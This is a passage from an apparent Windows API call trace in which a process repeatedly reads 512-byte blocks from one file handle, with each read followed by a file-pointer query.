lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.344] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.344] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.344] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0096.344] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.344] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.344] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.344] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.344] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.344] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.344] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.344] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.344] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 
[0096.344] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.345] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.345] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.345] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, 
lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.346] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.346] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.346] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 
[0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, 
lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 
[0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
